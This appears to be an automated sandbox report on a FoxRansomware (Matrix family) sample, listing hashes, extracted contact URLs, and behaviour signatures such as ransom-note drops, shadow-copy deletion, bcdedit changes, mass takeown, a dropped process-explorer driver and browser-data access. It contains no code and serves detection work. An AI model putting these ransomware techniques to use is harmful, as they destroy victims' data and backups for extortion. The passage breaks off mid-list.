Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\tr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Videos\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{D44822A8-FC28-42FC-8B1D-21A78579FC79}v64.0.4211\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\nl\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\storage\permanent\chrome\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Desktop\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zh_TW\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gaix9yhh.default-release\startupCache\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\SmsRouter\MessageStore\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Saved Games\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00006968\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mr\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}v48.100.4028\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\fonts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Extensions\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3096 bcdedit.exe 5320 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 153 2248 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
tm9TVtDr64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS tm9TVtDr64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
tm9TVtDr64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" tm9TVtDr64.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 64 IoCs
Processes:
NWZMgl5M.exetm9TVtDr.exetm9TVtDr64.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exetm9TVtDr.exepid process 5040 NWZMgl5M.exe 3296 tm9TVtDr.exe 1824 tm9TVtDr64.exe 5280 tm9TVtDr.exe 5372 tm9TVtDr.exe 4792 tm9TVtDr.exe 1304 tm9TVtDr.exe 5296 tm9TVtDr.exe 5616 tm9TVtDr.exe 5972 tm9TVtDr.exe 5636 tm9TVtDr.exe 888 tm9TVtDr.exe 5716 tm9TVtDr.exe 5752 tm9TVtDr.exe 5652 tm9TVtDr.exe 5364 tm9TVtDr.exe 5148 tm9TVtDr.exe 4276 tm9TVtDr.exe 1288 tm9TVtDr.exe 2804 tm9TVtDr.exe 6040 tm9TVtDr.exe 5780 tm9TVtDr.exe 5588 tm9TVtDr.exe 4392 tm9TVtDr.exe 4300 tm9TVtDr.exe 3968 tm9TVtDr.exe 5476 tm9TVtDr.exe 5516 tm9TVtDr.exe 5432 tm9TVtDr.exe 5824 tm9TVtDr.exe 1352 tm9TVtDr.exe 5704 tm9TVtDr.exe 5648 tm9TVtDr.exe 5264 tm9TVtDr.exe 5672 tm9TVtDr.exe 5568 tm9TVtDr.exe 5688 tm9TVtDr.exe 5344 tm9TVtDr.exe 2104 tm9TVtDr.exe 3556 tm9TVtDr.exe 5996 tm9TVtDr.exe 4428 tm9TVtDr.exe 5404 tm9TVtDr.exe 2512 tm9TVtDr.exe 5748 tm9TVtDr.exe 4808 tm9TVtDr.exe 5372 tm9TVtDr.exe 5276 tm9TVtDr.exe 6068 tm9TVtDr.exe 5356 tm9TVtDr.exe 1208 tm9TVtDr.exe 208 tm9TVtDr.exe 4496 tm9TVtDr.exe 5612 tm9TVtDr.exe 3924 tm9TVtDr.exe 4416 tm9TVtDr.exe 6048 tm9TVtDr.exe 1180 tm9TVtDr.exe 5928 tm9TVtDr.exe 6032 tm9TVtDr.exe 2180 tm9TVtDr.exe 5180 tm9TVtDr.exe 1936 tm9TVtDr.exe 6136 tm9TVtDr.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 3720 takeown.exe 5196 takeown.exe 5924 takeown.exe 2088 takeown.exe 1840 takeown.exe 5212 takeown.exe 6060 takeown.exe 1096 takeown.exe 4392 takeown.exe 3556 takeown.exe 5412 takeown.exe 6064 takeown.exe 5832 5256 5900 takeown.exe 6004 takeown.exe 5460 takeown.exe 3192 3724 takeown.exe 5576 5764 3720 takeown.exe 4148 takeown.exe 5148 5124 takeown.exe 5820 takeown.exe 5392 takeown.exe 5472 3700 4452 takeown.exe 1412 6056 3004 6056 takeown.exe 2060 takeown.exe 4768 5456 5484 5612 takeown.exe 1564 takeown.exe 2620 takeown.exe 5744 takeown.exe 2672 takeown.exe 5488 takeown.exe 2812 takeown.exe 3004 5636 3804 takeown.exe 1948 takeown.exe 5316 takeown.exe 2668 2216 4428 2536 takeown.exe 5552 takeown.exe 5196 takeown.exe 6040 3332 3452 takeown.exe 736 takeown.exe 32 5928 2624 1940 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exe upx behavioral12/memory/3296-771-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5280-2387-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5372-2414-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4792-2612-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1304-2655-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5296-3484-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5616-3626-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5972-3941-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3296-4057-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5636-4067-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/888-4161-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5716-4163-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5716-4164-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5752-4387-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5652-4389-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5364-4540-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5148-4803-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4276-5153-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1288-5155-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2804-5642-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6040-5706-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5780-5760-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5588-5796-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4392-5799-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4300-5826-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3968-5848-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5476-5899-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5516-6165-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5432-6167-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5432-6168-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5824-6172-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1352-6176-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5704-6178-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5704-6179-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5648-6181-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5264-6310-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5672-6348-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5568-6421-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5688-6497-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5344-6733-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2104-6735-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3556-6738-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5996-6740-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4428-6744-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5404-6746-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/2512-6748-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5748-6750-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4808-6754-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5372-6756-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5276-6759-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5276-6758-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6068-6761-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5356-6765-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1208-6767-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/208-6770-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4496-6772-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4496-6773-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5612-6775-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/3924-6777-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/4416-6781-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/6048-6782-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/1180-6783-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral12/memory/5928-6784-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 27 IoCs
Processes:
